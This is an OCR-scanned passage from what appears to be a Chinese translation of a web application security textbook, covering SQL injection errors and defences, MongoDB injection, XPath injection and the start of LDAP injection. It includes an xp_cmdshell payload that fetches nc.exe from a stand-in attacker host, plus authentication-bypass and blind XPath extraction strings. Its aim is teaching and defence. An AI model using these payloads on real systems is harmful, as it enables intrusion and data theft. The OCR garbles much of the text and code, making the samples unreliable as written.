要 么 是 因为 正 试图 访问 一 个 不 存在 的 表 或 视图 ， 要 么 在 Oracle 中 ， 数 据 库 用 户 并 不 拥有 访问 
该 表 或 视图 的 权限 。 对 一 个 已 知 能 够 访问 的 表 (如 DUAL 表 ) 测试 查询 


当 遇 到 这 种 条 件 时 ，MySQL 应 可 以 揭示 当前 的 数据 库 模 式 DBNAME 





ORA-00920: invalid relational operator 
Msg 170, Level 15, State 1, Line 1 
Line 1: Incorrect syntax Pear foo 


You have an error in your SQL syntax. Check 
the manual that corresponds to your MySOL 
server version for the right syntax to use 
near '' at line 1 


可 能 更 改 了 WHERE 子 句 的 内 容 ，SQL 注 入 试图 使 语法 中 断 





ORA-00907: missing right parenthesis 
N/A 


You have an error in your SOL syntax. Check 
the manual that corresponds to your MySOL 
server version for the right syntax to use 
near '' at line 1 


SQL 注入 生效 ,但 注入 点 在 圆 括号 内 。 可 能 是 由 于 用 注入 的 注释 字符 〈--) 把 结尾 的 圆 括号 
当做 注释 处 理 了 
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( 绥 ) 
Oracle ORA-00900: invalid SOL statement 
MS-SQL Msg 170, Level. 15, Ptate 1,. Line 1 
Line 1: Incorrect syntax near foo 
MySQL You have an error in your SQL syntax. Check 
the manual that corresponds to your MySOL 
server version for the right syntax to use 
near XXXXXX 
原因 一 条 第 规 错误 消息 。 前 面 列 出 的 错误 消息 会 优先 于 这 条 错误 消息 显示 ， 因 此 肯定 出 现 了 其 他 
问题 。 可 以 尝试 男 一 种 输入 ， 以 获得 一 条 提供 更 多 信息 的 消息 
Oracle ORA-03001: unimplemented feature 
MS-SQL N/A 
MySQL N/A 
原因 执行 了 一 个 Oracle 禁 止 的 操作 。 如 果 位 于 UPDATE 或 INSERT 查 询 中 , 但 却 试 图 从 v$version 
显示 数据 库 版 本 字符 串 ， 就 会 出 现 这 条 消息 
Oracle ORA-02030: can only select from fixed tables/views 
MS-SQL N/A 
MySQL N/A 
原因 可 能 试图 编辑 一 个 SYSTEM 视 图 。 如 果 位 于 UPDATE 或 INSERT 查 询 中 ,但 却 试图 从 


vSversion 显 示 数 据 库 版 本 字符 种， 就 会 出 现 这 条 消息 


9.2.14 防止 SQL 注入 


尽管 其 表现 形式 和 利用 手段 的 复杂 程度 各 不 相同 , 但 通常 而 言 ，SQL 注 入 仍然 是 最 容易 防御 
的 漏洞 之 一 。 然 而 ， 关 于 SQL 注入 应 对 措施 的 讨论 经 常 造成 误导 ,许多 人 都 依赖 仅 部 分 有 效 的 防 
御 措施 。 
. 部 分 有 效 的 防御 措施 
由 于 单 引 号 在 SQL 注入 漏洞 中 占有 突出 地 位 ， 防 御 这 种 攻击 的 一 种 常用 方法 ， 就 是 将 用 户 输 
入 中 的 任何 单 引 号 配对 ， 对 它们 进行 转 义 。 但 是 ， 在 下 面 两 种 情况 下 ， 这 种 方法 无 效 。 
口 如 果 用 户 提交 的 数字 数据 内 置 在 SQL 查询 中 ， 这 种 数据 通 稼 并 不 包含 在 单 引 号 内 。 因 此 ， 
攻击 者 能 够 破坏 数据 的 使 用 环境 并 开始 输入 任意 SQL 查询 ， 这 时 就 不 必 输 入 单 引 号 。 
口 在 二 阶 SQL 注 入 攻击 中 ,最初 在 插 和 人 数据库 中 时 已 经 安全 转 义 的 数据 随后 被 从 数据 库 中 旋 
取出 来 ， 然 后 又 再 次 写 人 。 当 重新 使 用 数据 时 ， 最 初 配 对 的 引号 又 恢复 到 单 引 号 形式 。 
另 一 种 常用 的 应 对 措施 是 使 用 存储 过 程 完成 全 部 数据 库 访 问 。 无 颖 , 定制 的 存储 过 程 可 增强 
安全 性 ， 提 高 性 能 ; 然而 ， 由 于 两 方面 的 原因 ， 它 们 并 不 能 保证 防止 SQL 漏洞 。 
口 如 在 使 用 Oracle 的 示例 中 所 见 ， 编 写 存 在 缺陷 的 存储 过 程 可 能 在 目 身 代码 中 包含 SQL 注入 
漏洞 。 在 存储 过 程 中 构建 SQL 语句 时 也 可 能 出 现 类 似 的 安全 问题 , 使 用 存储 过 程 也 无 法 防 
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止 漏洞 产生 。 

口 即使 使 用 安全 可 徘 的 存储 过 程 ， 但 如 果 使 用 用 户 提 交 的 输入 以 不 安全 的 方式 调用 这 个 存 
储 过 程 , 也 仍然 可 能 出 现 SQL 注 入 源 洞 例如, 假设 用 户 注 册 功 能 在 一 个 存储 过 程 中 执行 ， 
该 存储 过 程 通 过 以 下 方式 调用 : 














exec sp RegisterUser 'joe', 'secret' 

这 个 语句 和 一 个 人 简单 的 INSERT 语 句 一 样 易 于 受到 攻击 。 例如 , 攻击 者 可 以 提交 以 下 密码 : 
foo'; exec master. .xp cmdshell ‘tftp wahh-attacker.com GET nc.exe'—— 

应 用 程序 将 执行 以 下 批量 查询 : 

exec Sp RegisterUser 'jJoe', 'foo'; exec master. .xp cmdshell 'tftgp 


wahh-attacker.com GET Nc.exXxe'——! 
因此 使 用 存储 过 程 并 没有 作用 。 

实际 上 ， 功 能 复杂 的 大 型 应 用 程序 需要 执行 成 干 上 万 条 不 同 的 SQL 语 句 ， 许 多 开发 者 认为 ， 
使 用 存储 过 程 重 复 执行 这 些 语句 是 对 开发 时 间 的 不 合理 利用 。 

2. 参数 化 查询 

大 多 数 数据 库 和 应 用 程序 开发 平台 都 提供 API， 对 不 可 信 的 输入 进行 安全 处 理 ， 以 防止 SQL 
注 和 漏洞。 参数 化 查询 〈 也 叫 预 处 理 语句 ) 分 两 个 步骤 建立 一 个 包含 用 户 输入 的 SQL 语句 。 

(1) 应 用 程序 指定 查询 结构 ， 为 用 户 输入 的 每 个 数据 预 留 占 位 符 。 

(2) 应 用 程序 指定 每 个 占 位 符 的 内 容 。 

至 天 重 要 的 是 , 在 第 二 个 步 又 中 指定 的 专门 设计 的 数据 无 法 破坏 在 第 一 个 步骤 中 指定 的 查询 
结构 。 因 为 查询 结构 已 经 确定 ， 且 相关 API 对 所 有 类 型 的 占 位 符 数 据 进行 安全 处 理 ， 因 此 它 总 被 
解释 为 数据 ， 而 不 是 语句 结构 的 一 部 分 。 

下 面 的 两 个 代码 示例 说 明了 使 用 用 户 数据 动态 创建 的 一 个 不 安全 查询 与 相应 的 参数 化 查询 
之 间 的 差异 。 在 第 一 段 代码 中 , 用 户 提 交 的 name 参 数 被 直接 舱 入 到 一 个 SQL 语 句 中 ,致使 应 用 程 

/ /定义 查询 结构 


String queryText = "select ename,sal from emp where ename ="'";} 






























































/ /拼接 用 户 提 供 的 名 称 

dueryText += request .getParameter ("name");: 
QueryText += """} 

/ /执行 查询 

stmt = con.createStatement().: 

rs = stmt.executeQuery (queryText): 


第 二 段 代码 使 用 一 个 问号 作为 用 户 提 交 参 数 的 占 位 符 ， 以 确定 查询 的 结构 。 随 后 ,代码 调用 
prepareStatement 方 法 解释 这 个 参数 , 并 确定 将 要 执行 的 查询 结构 。 之后, 它 使 用 setstring 
方法 指定 参数 的 实际 值 。 由 于 查询 的 结构 已 经 固定 ,这 个 值 可 为 任何 数据 类 型 ， 而 不 会 影响 查询 
的 结构 。 于 是 查询 得 以 安全 执行 : 
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// 定 义 查 询 结 构 
String QueryText = "SELECT ename,sal FROM EMP WHERE ename = ?"; 


// 通 过 数据 库 连 接 "con" 预 处 理 语句 
stmt = con.prepareStatement (aqueryText).: 


// 将 用 户 输入 添加 到 变量 1 (位 于 第 一 个 占 位 符 ?) 
stmt .setString(1, regquest.getParameter ("name"™)); 


/ /执行 查询 


rs = Stmt .executeOQuery!(); 


注解 ”建立 参数 化 查询 实际 需要 的 方法 和 语法 因数 据 库 和 应 用 程序 开发 平台 而 异 。 请 





参阅 第 18 章 了 解 一 些 最 常用 的 示例 。 


使 用 参数 化 查询 可 有 效 防止 SQL 注 入 ， 但 还 要 注意 以 下 几 个 重要 的 限制 。 

D 应 在 每 一 个 数据 库 查询 中 使 用 参数 化 查询 。 我 们 发 现 ， 在 开发 应 用 程序 的 过 程 中 ， 对 于 
每 一 个 查询 ， 开 发 者 都 要 判断 是 否 使 用 参数 化 查询 。 如 果 明 显要 应 用 用 户 提 交 的 输入 ， 
就 使 用 参数 化 查询 ; 否则 就 不 使 用 ,这 种 方法 是 造成 许多 SQL 注 入 漏洞 的 根源 所 在 。 首先， 
仅 注 意 由 用 户 直 接 提交 的 输入 ， 二 阶 攻击 就 很 容易 被 忽略 ， 因 为 已 经 被 处 理 的 数据 被 认 
为 是 可 信 的 。 其 次 ， 在 处 理 用 户 可 控制 的 数据 这 种 特殊 的 情况 下 ， 我 们 很 容易 犯错 。 在 
大 型 应 用 程序 中 ， 各 种 数据 项 被 保存 在 会 话 中 ， 或 者 由 客户 端 提交 。 其 他 人 可 能 并 不 知 
道 开 发 者 作出 的 假设 。 特 殊 数 据 的 处 理 方式 将 来 可 能 发 生 改 变 ， 在 以 前 安全 的 查询 中 引 
和 人 SQL 注入 漏洞 。 因 此 ， 规 定 在 整个 应 用 程序 中 都 使 用 参数 化 查询 更 安全 。 

口 插入 查询 中 的 每 一 种 数据 都 应 适当 进行 参数 化 。 我 们 遇 到 过 许多 这 样 的 示例 : 查询 中 的 
大 多 数 参 数 都 得 到 安全 处 理 ， 然 而 ， 有 一 两 个 数据 项 可 直接 连接 到 用 于 指定 查询 结构 的 
字符 串 中 。 如 果 以 这 种 方式 处 理 某 些 参数 ， 即 使 使 用 参数 化 查询 ， 也 无 法 防止 SQL 注入 。 

口 参数 占 位 符 不 能 用 于 指定 查询 中 表 和 列 的 名 称 。 在 极 少数 情况 下 ， 应 用 程序 需要 根据 用 
户 提 交 的 数据 在 一 个 SQL 查 询 中 指定 这 些 数据 项 。 当 遇 到 这 种 情况 时 , 最 好 使 用 一 份 由 已 
知 可 靠 的 值 组 成 的 “ 白 名 单 ”( 即 数据 库 实际 使 用 的 表 和 列 名 单 )， 并 拒绝 任何 与 这 份 名 
单 上 的 数据 不 匹配 的 输入 项 。 如 果 无 法 做 到 这 一 点 ， 就 应 对 用 户 输入 实施 严格 的 确认 机 
制 ， 例 如 ， 只 允许 字母 数字 字符 (不 包括 空白 符 )， 并 执行 适当 的 长 度 限制 。 

口 参数 占 位 符 不 能 用 于 查询 的 任何 其 他 部 分 ， 如 ORDER BY 子 句 中 的 ASC 或 DESC 关 键 字 ， 
或 任何 其 他 SQL 关键 字 ， 因 为 它们 属于 查询 结构 的 一 部 分 。 与 表 和 列 名 称 一 样 ， 如 果 需 
要 基于 用 户 提 交 的 数据 指定 这 些 项 目 ， 则 必须 对 其 执行 严格 的 白 名 单 确 认 ， 以 防止 可 能 
的 攻击 。 

3. 深层 防御 

通常 ,一 种 稳定 的 安全 机 制 应 采用 深层 防御 措施 提供 额外 的 保护 , 以 防止 前 端 防御 由 于 任何 

原因 失效 。 当 防御 针对 后 端 数 据 库 的 攻击 时 ， 应 采用 另外 三 层 防 御 。 
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口 当 访 问 数 据 库 时 ， 应 用 程序 应 尽 可 能 使 用 最 低 权 限 的 账户 。 一 般 情况 下 ， 应 用 程序 并 不 
需要 数据 库 管 理 员 权限 ， 它 只 需要 谈 取 并 写 入 目 己 的 数据 。 在 注重 安全 的 情况 下 ， 应 用 
程序 可 以 使 用 另 一 个 数据 库 账户 执行 各 种 操作 。 例如 ,如 果 90% 的 数据 库 查 询 只 需要 读 取 
访问 ， 就 可 以 使 用 一 个 并 不 具有 写 和 人 权限 的 账户 执行 这 些 查 询 。 如 果 某 个 查询 只 需要 旋 
取 一 部 分 数据 〈 例 如 ， 读 取 订 单 表 而 不 是 用 户 账户 表 )， 这 时 就 可 以 使 用 一 个 拥有 相应 访 
问 权 限 的 账户 。 如 果 可 以 在 整个 应 用 程序 中 实施 这 种 方法 , 就 可 以 降低 任何 剩余 SQL 注 和 人 
漏洞 给 应 用 程序 造成 的 影 啊 。 

口 许多 企业 数据 库 包 含 大 量 默 认 功 能 ,可 被 能 够 执行 任意 SQL 语 句 的 攻击 者 利用 ,如 有 可 能 ， 
应 删除 或 禁用 不 必要 的 功能 。 即 使 有 时 候 技 术 邵 练 、 蓄 意 破 坏 的 攻击 者 能 够 通过 其 他 方 
法 重新 建立 一 些 必需 的 功能 ， 但 做 到 这 一 点 通常 需要 复杂 的 操作 ， 而 且 数 据 库 实施 的 强 
化 措施 也 会 给 攻击 者 造成 难以 逾越 的 障碍 。 

口 应 评 佑 、 测 试 并 及 时 安 闭 供应 商 发 布 的 所 有 安全 人 补丁， 以 修复 数据 库 软 件 本 吴 已 知 的 漏 
洞 。 在 注重 安全 的 情况 下 , 数据 库 管 理 员 可 以 使 用 各 种 预订 服务 ( subscriber-based service ) 
提前 了 解 一 些 供应 商 疝 未 公布 补丁 的 已 知 漏洞 ， 及 时 采取 适当 的 防御 措施 。 
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术语 NoSQL 用 于 指 各 种 不 同 于 标准 的 关系 数据 库 体 系 架 构 的 数据 存储 区 。NoSQL 数 据 存储 
区 呈现 使 用 键 / 值 映射 的 数据 ， 并 且 不 依赖 于 固定 的 方案 ， 如 传统 的 数据 库 表 。 键 和 值 可 以 任意 
定义 ， 而 且 值 的 格式 通常 与 数据 存储 区 无 关 。 键 / 值 存 储 的 另 一 个 特点 在 于 ， 值 可 能 为 数据 结构 
本 身 ， 因 而 可 以 实现 层次 化 存储 ， 这 与 数据 库 方 案 中 的 平面 数据 结构 不 同 。 

支持 上 述 数据 存储 的 NoSQL 具 有 各 方面 的 优势 ， 这 些 优势 主要 体现 在 处 理 庞 大 的 数据 集 方 
面 ， 以 便于 根据 需要 对 数据 存储 区 中 的 层次 化 数据 进行 优化 ， 以 减少 检索 数据 集 的 开销 。 在 这 些 
情况 下 ， 传 统 的 数据 库 可 能 需要 对 表 进 行 复杂 的 交叉 引用 ， 才 能 代表 应 用 程序 检索 信息 。 

从 Web 应 用 程序 安全 的 角度 看 ,我 们 主要 关注 应 用 程序 如 何 查询 数据 ， 因 为 这 决定 了 攻击 者 
可 以 进行 何 种 形式 的 注入 。 就 SQL 注入 而 言 ， 不 同 数据 库 产 品 采 用 的 SQL 语言 大 体 相 似 。 相 反 ，， 
NoSQL 代 表 着 一 类 全 新 的 数据 存储 区 , 它们 的 行为 各 不 相同 。 而 且 , 它们 并 非 全 都 使 用 单一 的 查 
询 语言 。 

以 下 是 NoSQL 数 据 存储 区 采用 的 一 些 常 用 的 查询 方法 : 

口 键 / 值 查询 ; 

口 XPath ( 将 在 本 章 后 面部 分 介绍 ); 

口 编程 语言 ( 如 JavaScript )。 

NoSQL 是 一 种 快速 发 展 的 相对 较 新 的 技术 。 与 SQL 等 比较 成 熟 的 技术 不 同 , 它 并 没有 进行 大 
规模 地 部 署 。 因 此 ， 对 于 NoSQL 相 关 漏 洞 的 研究 仍 处 于 早期 阶段 。 此 外 ， 由 于 许多 NoSQL 技 术 
访问 数据 的 方式 十 分 简单 ， 讨 论 注 和 NoSQL 数 据 存储 区 的 示例 有 时 明显 是 虚构 的 。 

几乎 可 以 肯定 的 是 , 当前 和 将 来 的 Web 应 用 程序 使 用 NoSQL 数 据 存储 区 的 方式 将 存在 可 被 利 
用 的 漏洞 。 我 们 将 在 下 一 节 中 讨论 一 个 这 样 的 示例 ， 该 示例 源 于 真实 的 应 用 程序 。 
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注入 MongoDB 








许多 NoSQL 数 据 库 利用 现 有 的 编程 语言 来 提供 灵活 、 可 编程 的 查询 机 制 。 如 果 使 用 字符 串 连 
接 构 建 查询 ， 攻 击 者 就 可 以 尝试 破坏 数据 并 更 改 查 询 的 语法 。 以 下 面 的 查询 为 例 ， 它 基于 
MongoDB 数 据 存 储 区 中 的 用 户 记 录 进 行 登录 : 


Sm = new Mongo();: 
sdb = sm->cmsdb: 








scollection = Sdb->user:; 

$js = "functionm{() { 

return this.username == 'Ssusername’' & this.password == 'Spassword'; }":， 
Sobj = Scollection->findOone (array ('$Swhere’ => $jJs)) 


if {isset (S$obj["uid"])})) 


sloggeqd in=1; 


Sslogged in=0; 
} 


$js 是 一 个 JavaScript 钠 数 ， 其 代码 是 动态 构建 的 ， 并且 包含 用 户 提交 的 用 户 名 和 和 密码。 攻击 
者 可 以 通过 提供 以 下 用 户 名 和 任意 密码 来 避 开 验证 逻辑 : 


Marcus'// 


生成 的 JavaScript 国 数 如 下 所 示 : 


function{(}) { return this.username == 'Marcus'//' & this.pbassword == 'aaa'; } 











注解 ”在 JavaScript 中 ， 双 正 斜 杠 0/ ) 表示 行 尾 注释 ， 因 此 ， 函 数 中 的 剩余 代码 将 被 
注释 挥 。 
另 一 种 不 使 用 注释 而 确保 $js 函 数 始 终 返 回 “ 真 ”的 方法 ， 是 提供 以 下 用 户 名 : 


二 





JavaScript 以 如 下 方式 解释 各 种 运算 符 : 


(thig.username == "a || 1==1) || ("a's="a' & thisg.password =s 
'aaa'); 


这 将 匹配 用 户 集 合 中 的 所 有 资源 ， 第 一 个 选择 性 条 件 始 终 为 真 ( 1 始终 等 于 1 )。 





9.4 注入 XPath 





XPath( XML 路 径 语言 ) 是 一 种 用 于 导航 XML 文档 并 从 中 获取 数据 的 解释 型 语言 。 许 多 时 候 ， 
一 个 XPath 表达 式 代 表 由 一 个 文档 节点 导航 到 另 一 个 文档 节点 所 需要 的 一 系列 步骤 。 








9.4 六 入 XPath | 


如 果 Web 应 用 程序 将 数据 保存 在 XML 文档 中 ， 那 么 它们 可 能 使 用 XPath 访问 数据 ， 以 啊 应 用 
户 提交 的 输入 。 如 果 这 个 输入 未 经 任何 过 滤 或 净化 就 搬入 到 XPath 查询 中 ， 攻 击 者 就 可 以 通过 控 
制 查询 来 破坏 应 用 程序 的 逻辑 ， 或 者 获取 未 获 授 权 访 问 的 数据 。 

通常 ，XML 文 档 并 不 是 保存 企业 数据 的 首先 工具。 但 是 ， 它 们 常常 被 用 于 保存 可 根据 用 户 
输入 获取 的 应 用 程序 配置 数据 。 小 型 应 用 程序 也 使 用 它们 保存 简单 的 信息 ， 如 用 户 证 书 、 角 色 和 
权限 。 以 下 面 的 XMIL 数 据 为 例 : 


<addressBook> 








<address> 
<firstName>William</firstName> 
<Surname>Gates</surname> 
<Password>MSRocks!</password> 
<email>billyg@microsoft.com</email> 
<CCarq>D130 8190 3282 3515</ccard> 

</address> 

<address> 
<firstName>Chris</firstName> 





<Surname>Dawes</surname> 
<password>secret</password> 
<email>cdawes@Qcraftnet.de</email> 
<cCcard>3981 2491 3242 3121</ccard> 
</address> 
<address> 
<firstName>James</firstName> 
<sSurname>Hunter</surname> 
<pbassword>letmein</password> 
<email>james.hunter@pookmail.com</emalil> 
<CCarq>8113 5320 8014 3313</ccard> 
</address> 





</addressBook> 

一 个 获取 所 有 电子 邮件 地 址 的 XPath 查 询 如 下 : 

//address/email/text() 

一 个 返回 Dawes 的 全 部 用 户 资 料 的 查询 为 : 

//address[surname/text()=,Dawes' 

在 一 些 应 用 程序 中 ， 用 户 提 交 的 数据 可 被 直接 租 入 到 XPath 查询 中 ,， 碍 询 的 结 采 可 能 在 应 用 
程序 的 啊 应 中 返回 ， 或 者 用 于 决定 应 用 程序 某 些 方面 的 行为 。 


9.4.1 破坏 应 用 程序 逻辑 


以 一 个 根据 用 户 名 和 和 密码 获得 用 户 保存 的 信用 卡号 人 码 的 应 用 程序 功能 为 例 。 下 面 的 XPath 查 
询 核 实用 户 提交 的 证 书 ， 并 获取 相关 用 户 的 信用 卡号 码 : 

/:/address[lsurname/text()='Dawes' and password/text()='secret'] /ccard/ 

text{) 
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与 利用 SQL 注入 漏洞 一 样 ， 这 时 攻击 者 也 可 以 破坏 应 用 程序 的 查询 。 例 如 ， 提 交 密 码 人 
将 导致 下 面 的 XPath 碍 询 ， 获 取 所 有 用 户 的 信用 卡 信息 : 


/:/address[surname/text{(}='Dawes’' angd password/text{)='' or 'a'='a’']/ 











ccard/text!) 


注解 
口 与 SQL 注 入 一 样 ， 注 入 一 个 数字 值 时 不 需要 单 引 号 。 





与 SQL 查 询 不 同 ，XPath 查 询 中 的 关键 字 区 分 大 小 写 ,， XML 文 档 中 的 元 素 名 也 区 
分 大 小 写 。 





9.4.2 ” 谨 愤 XPath 注 入 


攻击 者 可 利用 XPath 注 入 漏洞 从 目标 XML 文 档 中 获取 任意 信息 。 获 取信 息 的 一 种 可 菲 途径 是 
使 用 和 上 述 SQL 注 入 时 相同 的 技巧 , 促使 应 用 程序 根据 攻击 者 指定 的 条 件 以 不 同 的 方式 做 出 响应 。 
提交 以 下 两 个 密码 将 导致 应 用 程序 的 不 同行 为 : 第 一 种 情况 返回 结 来 , 但 第 二 种 情况 不 返回 





























卡 
第 


! or 1=1 and 'a'='a 


! Or 1=2 and 'a 

这 种 行为 差异 可 用 于 测试 任何 特殊 条 件 的 真 假 , 因此 可 通过 它 一 次 一 个 字 广 地 提取 出 任 音信 
上 县。 与 SQL 一 样 ，XPath 语 言 也 包含 一 个 子 字符 串 函 数 ， 可 用 它 一 次 一 个 字符 地 测试 一 个 字符 串 
的 值 。 人 例如， 提交 密 码 


可 














'! or //address[surname/text(})='CGates' and substring (password/text(},1,1})= 
'M’i] and 'a'='a 
将 导致 下 面 的 XPath 查询 ， 如 果 用 户 Gates 密 码 的 第 一 个 字符 为 M， 将 返回 查询 结果 : 
/:/address[surname/text(})}='Dawes' and password/text(}="'" Or 
/:/address[lsurname/text(}='Gates' and substring (password/text(}),1,1})= 'M'. 
and 'a'='a ']/ccard/text!) 


轮流 针对 每 个 字符 位 置 并 测试 每 个 可 能 的 值 ， 攻 击 者 就 能 够 获得 Gates 的 完整 密码 。 


尝试 访问 


http://mdsec.net/cclookup/14/ 


9.4.3 ”盲目 XPath 注 入 


在 前 面 的 攻击 中 , 注入 的 测试 条 件 指定 了 提取 数据 的 绝对 路 径 (addqress ) 以 及 目标 字段 的 
名 称 surname 和 pas sword 上 实际 上 ， 即使 不 了 解 这 些 信 息 ， 攻击 者 仍 有 可 能 发 动 完全 育 目的 
攻击 。XPath 奋 询 可 包含 二 XML 文档 中 当前 节点 有 关 的 步 又 ， 因 此 ， 从 当前 节点 可 以 导航 到 父 刷 
点 或 一 个 特定 的 子 节 点 。 夯 外 ，XPath 包 含 可 查询 文档 元 信息 《包括 特殊 元 素 的 名 称 ) 的 函数 。 
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使 用 这 些 技 巧 就 可 以 提取 出 文档 中 所 有 市 点 的 名 称 与 值 , 而 不 必 提 前 知道 与 它 的 结构 或 内 容 有 关 
的 任何 信息 。 

例如 ,可 以 使 用 前 面 描述 的 子 字符 串 技巧 , 通过 提交 如 下 格式 的 密码 ,提取 当前 市 点 的 父 厄 
点 的 名 称 : 

' or substring(name(Parent::*[Dposition()=1])，1,1)= 'a 

这 个 输入 能 够 返回 结果 ， 因 为 adadqress 贡 点 的 第 一 个 字母 为 a。 轮 到 第 二 个 字母 ， 这 时 可 以 

过 提交 下 列 密码 确定 该 字母 为 4，， 因 为 最 后 一 个 输入 返回 了 结 














or substring (name (parent::*[position()=1]},2,1})='a 
! or substring (name (parent::*[pPosition(})=1]),2,1})='b 
'! or substring (name (parent::*[pPosition(}=1]),2,1})='c 
'! or substring (name (parent::*[pPosition(}=1]),2,1}='qQd 








确定 adqress 世 点 的 名 称 后 , 攻击 者 就 可 以 轮流 攻击 它 的 每 一 个 子 市 点 , 提取 出 它们 的 名 称 
与 值 。 通 过 索引 指定 相关 了 下 点 可 不 必 知 道 任 何 贡 点 的 名 称 。 例 如 , 下 面 的 查询 将 返回 值 Hunter: 
//address[position()=3]/child: :node() [position()=4] /text{()} 
而 下 面 的 查询 返回 值 1etmein: 
//address[position()=3]/child: :node() [position()=6]/text{() 
这 种 技 马 可 用 在 完全 到 目的 攻击 中 , 这 时 应 用 程序 在 啊 应 中 不 返回 任何 结果 , 我 们 可 以 设计 
个 注入 的 条 件 ， 通 过 索引 指定 目标 节点 。 例 如 ， 如 有 末 Gates 密 码 的 第 一 个 字母 为 6， 提 交 下 面 的 














密码 将 返回 结果 : 
' or substring(//address[position{(}=1]/child: :node() [position(}=6]/ 
text{(},1,1})= 'M' and 'a'='a 





轮流 攻击 每 个 地 址 节点 的 每 个 子 节点 , 并 一 次 一 个 字符 地 提取 出 它们 的 值 , 攻击 者 就 可 以 提 
取 整 个 XML 数据 的 内 容 。 


提示 “XPath 中 有 两 个 有 用 的 函数 ， 可 帮助 自动 完成 上 述 攻 击 ， 迅速 遍历 XML 文档 中 
YY 的 所 有 节点 和 数据 。 
口 count ()。 这 个 函数 返回 指定 元 素 的 子 节点 数量 ， 可 用 于 确定 需要 遍历 的 


position() 值 的 范围 。 
口 string-length()。 这 个 函数 返回 一 个 已 提交 字符 串 的 长 度 ， 可 用 于 确定 需 
要 遍历 的 substring() 值 的 沁 围 。 


尝试 访问 


http://mdsec.net/cclookup/19/ 





9.4.4 查找 XPath 注入 漏洞 
许多 肖 用 于 探查 SQL 注 入 源 洞 的 攻击 子 符 串 如 来 被 提交 给 一 个 易于 受到 XPath 注 入 的 函数 ， 
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往往 会 导致 反 前 行为 。 例 如 ， 下 面 的 两 个 字符 会 破坏 XPath 奋 询 的 请 法， 从 而 造成 错误 : 


通常 , 与 在 SQL 注入 漏洞 中 一 样 ， 下 面 的 一 个 或 几 个 字符 串 将 会 引起 应 用 程序 的 行为 发 生变 
化 ， 但 不 会 造成 错误 : 

! and i 

or 1=1 

and 1=2 

因此 , 任何 时 候 ， 如 采 在 探查 SQL 注入 过 程 中 发 现 一 个 漏洞 的 初步 证 据 ， 但 却 无 法 对 该 漏洞 
加 以 利用 ， 那 么 遇 到 的 可 能 就 是 XPath 注入 漏洞 。 

















ET 


(1) 答 试 提交 下 面 的 值 ， 并 确定 它们 是 否 会 导致 应 用 程序 的 行为 发 生 改 变 ， 但 不 会 造成 





销 误 : 











eele be ee eosin eae 

ene Li ne Sn 

如 果 参 数 为 数字 ， 尝 试 提交 下 面 的 测试 学 符 串 : 

Ionrmelonme nem seen 0 

1 or count (parent::*[position()=1])>0 

(2) 如 打上 面 的 任何 字符 串 导 致 应 用 程序 的 行为 发 生 改 变 ， 但 不 会 造成 错误 ， 很 可 能 可 以 
通过 设计 测试 条 件 , 一 次 提取 一 个 字 节 的 信息 ,从 而 获取 任意 数据 。 使 用 一 系列 以 下 格式 的 条 
件 确 定 当 前 六 点 的 父 市 后 的 名 称 : 

substring (name (parent::*[position()=1]),1,1)='a' 

(3) 提取 出 父 厄 点 的 名 称 后 ， 使 用 一 系列 下 面 格式 的 条 件 提取 XML 树 中 的 所 有 数据 : 

substring(//parentnodename [position()=1]/child::nodel() 


L5081l1tElomn()s1ll/ Eexe() ,l,i1)s'a! 


9.4.5 ”防止 XPath 注入 


如 采 沉 得 必须 在 一 个 XPath 查询 中 搬入 用 户 提 交 的 输入 ， 应 该 只 提交 可 实施 严格 输入 确认 的 
简单 数据 。 应 根据 一 份 由 可 接受 字符 组 成 的 “ 白 名 单 ” 检 查 用 户 输入 ， 其 中 最 好 只 包括 字母 数字 
字符 。 应 阻止 任何 可 能 破坏 XPath 查 询 的 字符 ， 包 括 ( )= ' [ ] :，* /和 所 有 空白 件 。 下 接 
拒绝 而 不 是 净化 任何 与 日 名 单 不 匹配 的 输入 。 




















9.5 注入 LDAP 


LDAP ( Lightweight Directory Access Protocol， 轻 量 级 目录 访问 协议 ) 用 于 访问 网 络 中 的 目 
录 服 务 。 目 录 是 一 个 分 级 结构 的 数据 存储 区 ， 其 中 可 能 包含 任何 类 型 的 信息 , 但 常用 于 保存 个 人 
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言 息 ， 如 姓名 、 电 话 号 码 、 电 子 邮 件 地 址 和 工作 职能 等 。Windows 域 中 使 用 的 Active Directory 束 
是 这 种 目录 的 一 个 典型 示例 。LDAP 还 第 用 在 企业 内 联网 Web 应 用 程序 中 ， 如 允许 用 户 查 看 并 修 
改 雇员 信息 的 人 力 资 源 应 用 程序 。 

每 个 LDAP 查 询 使 用 一 个 或 多 个 搜索 过 滤 闹 ， 它 们 决定 了 请 求 返 回 的 目录 项 。 搜 索 过 滤 答 可 

以 使 用 各 种 逻辑 运算 符 来 表示 复杂 的 搜索 条 件 。 最 常用 的 搜索 过 滤 顺 如 下 。 

口 简单 匹配 条 件 〈simple match conditions ) 对 单个 属性 的 值 进行 匹配 。 例 如 ,通过 用 户 名 搜 
索 用 户 的 应 用 程序 函数 可 能 使 用 以 下 过 滤 带 : 

(username=daf) 

口 析 取 查询 ( disjunctive queries ) 指定 多 个 条 件 , 返回 的 目录 项 必须 满足 其 中 任何 一 个 条 件 。 

例如 ， 在 多 个 目录 属性 中 查找 用 户 提供 的 搜索 项 的 搜索 另 数 可 能 使 用 以 下 过 滤 需 : 
(| (cn=searchterm) (sn=searchterm) (ou=searchterm) ) 

口 合 取 查询 ( conjunctive queries ) 指定 多 个 条 件 , 返回 的 目录 项 必须 满足 所 有 这 些 条 件 。 例 

如 ，LDAP 中 实施 的 登录 机 制 可 能 使 用 以 下 过 滤 需 : 
(& (USername=daf) (password=secret) 

和 其 他 形式 的 注入 一 样 , 如 果 用 户 提 交 的 输入 不 经 任何 确认 即 被 插入 到 LDAP 搜 索 过 滤 需 中 ， 

攻击 者 就 可 以 通过 提交 专门 设计 的 输入 来 修改 过 滤 硕 的 结构 ， 以 检索 数据 或 执行 未 授权 操作 。 

一 般 而 言 ， 与 SQL 注入 漏洞 相 比 ，LDAP 注 入 遍 洞 更 难以 被 攻击 者 利用 ， 原 因 如 下 。 

口 搜索 过 滤 硕 采用 逻辑 运算 符 来 指定 析 取 或 合 取 查 询 的 位 置 通 背 位 于 用 户 提交 的 数据 的 插 
和 位置 之 前 ,因而 无 法 被 修改 。 因 此 , 简单 匹配 条 件 和 合 取 查询 不 会 受 与 SQL 注 和 人 类 似 的 
“or 1=1” 类 型 的 攻击 。 

口 在 常用 的 LDAP 服 务 中 ,返回 的 目录 属性 将 作为 搜索 过 滤 右 中 的 独立 参数 传递 给 LDAP 
